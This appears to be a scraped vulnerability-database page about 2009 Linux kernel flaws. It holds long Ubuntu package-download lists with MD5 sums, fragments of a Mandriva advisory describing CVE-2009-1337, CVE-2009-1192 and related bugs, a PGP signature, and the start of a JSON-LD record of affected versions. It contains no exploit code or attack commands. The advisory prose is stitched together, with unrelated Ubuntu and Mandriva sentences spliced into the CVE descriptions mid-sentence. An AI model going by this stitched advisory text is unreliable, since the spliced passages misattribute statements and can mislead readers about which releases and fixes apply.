http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    78252 3306e0596c6ec6a941906ec5cf1b5896
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    86172 14f820994a04b74bacc55f908ced747a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    51176 929ace31f9151a14f646711b57141335
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:     8794 c6ff3050c0e8d61f69978e3a64f3afc0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    64308 ab5438618e09f3747c9cabe4d2202d42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   102010 d66cf8423068745b1896a2d37087ea57
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:  1449250 cc24f0d8b7411f15f0b3704c92c73719
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    44514 0763f6eeda9cf0971a5145eeca31a37b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    12642 4142729eb596aefe6b55a3c91b537aa7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   372528 2ec016366a3c65b130470af25b4f4cd9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:   189698 577f8d2648589a2620fe4917bcd90e4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb
  Size/MD5:    12992 aaf90b0f25f26915752e0d01ffdf1404

Updated packages for Ubuntu 9.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-13.45.diff.gz
  Size/MD5:  7052018 c30f6c12f534fb270e77a8db16658c00
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-13.45.dsc
  Size/MD5:     1988 c31e8f14e5353913483bcbe5134a221a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz
  Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-13.45_all.deb
  Size/MD5:  3630660 dff37123aa2a0a01813aaafa113efeaa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13_2.6.28-13.45_all.deb
  Size/MD5:  8694158 d568990611704c5022f17a406bba56da
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-13.45_all.deb
  Size/MD5: 56896726 2218180442fe2265c4a383718103d24b

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:   234530 8ca4ab91f04156b591af5e036a9d9eaf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    44110 3d35edf87a693b4aec248c4e110db223
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    43326 8b5f1e9917275cb49fd5cdc5fe7c372c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    51102 a1b090802ce4589182c26704db51e79a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    89946 692cdd4f68027d91736aee9507a279a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    37992 40f149752511e8e7d4b527bd321f5f61
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:   521610 a346bd312d8eed61e8bb96fb59f3b9b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:   125632 86429c19731c1bbc4fc7025d4659f4e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    58050 dbb7ceb698b6e40a9429b35804416265
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:   312206 2bd5e6bd4338e51c72d349a40a24afb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:  3867978 7532ceaadca5ac062476c9a058e87f87
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-generic_2.6.28-13.45_amd64.deb
  Size/MD5:   684590 ce636ed44071caf1eb5696a5b4cd3d52
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-server_2.6.28-13.45_amd64.deb
  Size/MD5:   684602 67c72e9124b19974c39f55341d293d4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-generic_2.6.28-13.45_amd64.deb
  Size/MD5: 24250596 54189eb7095f154663e12fcbd03e3052
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-server_2.6.28-13.45_amd64.deb
  Size/MD5: 24255096 11079badc74f668bfa9299a94eee9500
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-virtual_2.6.28-13.45_amd64.deb
  Size/MD5: 10522290 889f00238ab9579a1a3787b6f4093bba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_amd64.deb
  Size/MD5:   761032 20f696493a51b361c8211cd3a99773a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:   215158 e7434a687dec03b384f88e8e86870b2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:   189390 cd7116d69deef0ccd449097583b27125
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    29396 de5e69d2393ad59f85a530a3a1076f03
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:   274128 a4bb104369c8be8748a38ec66a6649b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:  1826044 25d1a4452606ab450f214afd2c6da482
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:   163490 edffca1a4f08889ab04638134e70bdfa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:   194758 84976648caa181490b9c748f7672e20c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:   152946 38f0b1e429efc2993fb2f0346daf98d2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    36490 09b7bf2b970fab395adc80da34772183
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:     5842 6a537fc3a2af29ba6fd981ce8b2b19f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    72132 2416b9382cc51b3b1c424d52bbf379b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    22716 d5f4dc6ca66de6c6044e2fcfcf9783c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:     8878 58927a3e2b4abbb9a3e0e19c969b701a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    47470 8cd84b96c9d3b1e32b3e7d29042b4a91
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    15622 5b3599e51e3513f458430702ba57410a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:  1272842 175bd4440eb113fa0b72b1c3897457c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    47218 3bf3faa60421de087af2696985c361eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    72626 f431e2290ae3347326ff8b3fc5b5bf98
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:   126946 c82470ee359a4f8d7879367739e73f1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb
  Size/MD5:    13472 0299bdd96f706adde62bcbf1fe873527

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:   215716 af09e22b5eededba6f06bbce4b6f7f6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    46662 cbb33d90c53ae6c5a277c9f4402188e1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    41344 c369ce39d1595df751bf81a7ca1d4831
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    47378 092cfe8af282c15f332902a0295fe1b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    86848 c2b5e966fc9e4476ab1b6c6fde5bb7a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    33574 e7b69e22af4eb33299e772769f464803
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:   525474 11f2df9f8143a48c6395b3b51fbd964e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:   125494 feafd7e08878356c984098698d832b72
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    54864 7bf17f733cf036e0492643870dbc439a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:   300874 8e5766303f17caafeffc6db2d3590487
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:  3741754 f62502087f0d206a7c43856618b63099
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-generic_2.6.28-13.45_i386.deb
  Size/MD5:   668290 36fb94764dc7b473989ab048f6f8d18d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-server_2.6.28-13.45_i386.deb
  Size/MD5:   669404 6dcdc4988b80b0d5fad7a49eec4b3f68
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-generic_2.6.28-13.45_i386.deb
  Size/MD5: 24584190 6d3e2aed50aed94ac91512384ae202a8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-server_2.6.28-13.45_i386.deb
  Size/MD5: 24662820 2f4ac0738424f2295bff2077238b126b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-virtual_2.6.28-13.45_i386.deb
  Size/MD5: 10219490 e088239542d6b5caa4ba16b16c9ca5ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_i386.deb
  Size/MD5:   761048 a2f34260d40ebb215d26ed09a45e4fe1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:   218044 3cfad485954208027c844fe40bc0b838
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:   174812 bf413e3a9b0cb7ab124f411ead7df97d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    30068 22dfd9b4f06187b520b67d4855f7573f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:   262414 0e23c7445d3582011f9767101e4af06c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:  2007452 f84390b7d8d9f8b32c74823649b247aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:   150198 05caa7db9bb38f7a42ec7ab0deb6ce47
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:   184298 45df2dcc24ab9a0ffc27da827f246206
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:   143542 5f862fc8f33fc1e4fbcabf78a733f1de
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    34572 92451114d002c65edb0d89d053a7037e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:     5502 f39f3f824fff9020a7fa80358fdfe7b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    85990 04a9436fc3c061a9feedf8a46b79a534
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    47334 7134b0740644c5c266d52dc6d7524d68
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:     8712 cbd3f0e41be40915f413ac5802a6221e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    44698 0cd8ea7ec39409e8563ab5c8c9e0248c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    14740 c7287bd485367a228246ef8502f3d175
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:  1445196 81a9314640917265a536c3894ceed78a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    44092 84aac7e95054a44fcfc589bce5129355
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    69138 e79c9c942d7e02b83359cc1fe7fe6e6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:   119512 ca6a4973ba663fe06f57b52c47b3fe5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb
  Size/MD5:    12672 cff86af5ddbc47b6cc5dbf6892f7f3ad

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   215242 34f3d0cfbebcc281bff8887d58a2fdd1
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    46662 b60318e129f56b4f1ace761bfcbfeb8c
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    40950 aaa3fffb7bbd0ad7dbe1a49fd48d3cb0
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    47292 4ca4fffc517a758eb5a9dc3dd69eb2c3
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    86454 ba73d27d65487eed24ef32dade5dd6f3
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    33270 96d878bfefd1667337a7d781624744fe
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   523424 3b0daef52c7fbc78f477a82d2885eedb
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   125172 ca7244bb0c9ea93bf1793fafc8d93249
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    63536 a2ddb239393108fb7888391bdbcc0235
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   300334 b0fe7216d15a908a78ef5eee547efef9
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:  3033028 ae4b9666c230f663aa490e5ef7915d3c
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-13-lpia_2.6.28-13.45_lpia.deb
  Size/MD5:   636848 685ad5fdd4837d0fc7670b40fdc55424
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-13-lpia_2.6.28-13.45_lpia.deb
  Size/MD5: 21714272 d7a1bafe41d1f5aaf8c2b67a9171c5df
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_lpia.deb
  Size/MD5:   761014 ebaf6b30ac3b8f5eeaa396e980eef83f
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   303684 5e037a0ca19df39904654a98a34a1bc6
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   157340 00f6f5576c21231b566afa0e2cf8fd61
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    24440 86b67b982ba9ca31546e0b2a21f0f864
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   259984 8c79116a9aeb8b302834f8e1fc266955
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:  1925766 1212a0ff61f4eda2f650f309d08be026
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   149320 40933fec799a654327e69f3e147f84d5
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   184726 9c6154589bfc80b2dbddd2bcb84427de
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   143218 050db10728b271bdc222ec1af04581cb
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    34468 33f04ac2a7c747cace4c3cca47fc5c33
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:     5494 d974930a7f9c6808966eb8a90f7b6e09
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    85642 67d356fdc7853f0e2080da162297ce7a
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    47256 d814aa4d377714470bd6acc6a5e310db
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:     8708 97001eca3bfbeea54af2f8754beb6417
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    63068 f7c2bd8e6e913ccebecc87873d9c5ce3
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    14688 2bf1158a576fa810d85facf7bfd4b6d2
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:  1446758 b3a985a1ea798516afd4a7afd356a2e9
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:    43890 c37408769b4cd3de313f21dd7c1ae220
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   154914 2d14ce87eaa2b0f3ab967c818d87648b
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:   172600 716eff2706e585a3064c44ca8fae9ce9
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb
  Size/MD5:     8158 3cac29e81c3e9d2a3d905761f572e74d

. Local users can exploit this vulnerability to gain elevated privileges. Rather, they will be released in a staggered or "leap-frog" fashion. Updates for arm and mips will be released as they become available. (CVE-2009-1184)

The exit_notify function in kernel/exit.c in the Linux kernel before 2.6.30-rc1 does not restrict exit signals when the CAP_KILL capability is held, which allows local users to send an arbitrary signal to a process by running a program that modifies the exit_signal field and then uses an exec system call to launch a setuid application. (CVE-2009-1337)

The (1) agp_generic_alloc_page and (2) agp_generic_alloc_pages functions in drivers/char/agp/generic.c in the agp subsystem in the Linux kernel before 2.6.30-rc3 do not zero out pages that may later be available to a user-space process, which allows local users to obtain sensitive information by reading these pages. (CVE-2009-1192)

The ABI in the Linux kernel 2.6.28 and earlier on s390, powerpc, sparc64, and mips 64-bit platforms requires that a 32-bit argument in a 64-bit register was properly sign extended when sent from a user-mode application, but cannot verify this, which allows local users to cause a denial of service (crash) or possibly gain privileges via a crafted system call. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com


Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKORHLmqjQ0CJFipgRAnzRAJ9w1CGojCsYdG001OcNmQuVonRkrwCeNMpH bzIigZKDE4V8120vojufik8= =cJ+u -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200906-0598",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.29.rc1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.29.rc2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7.0.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6.2.15"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7.3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "e1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5.3.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.25.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
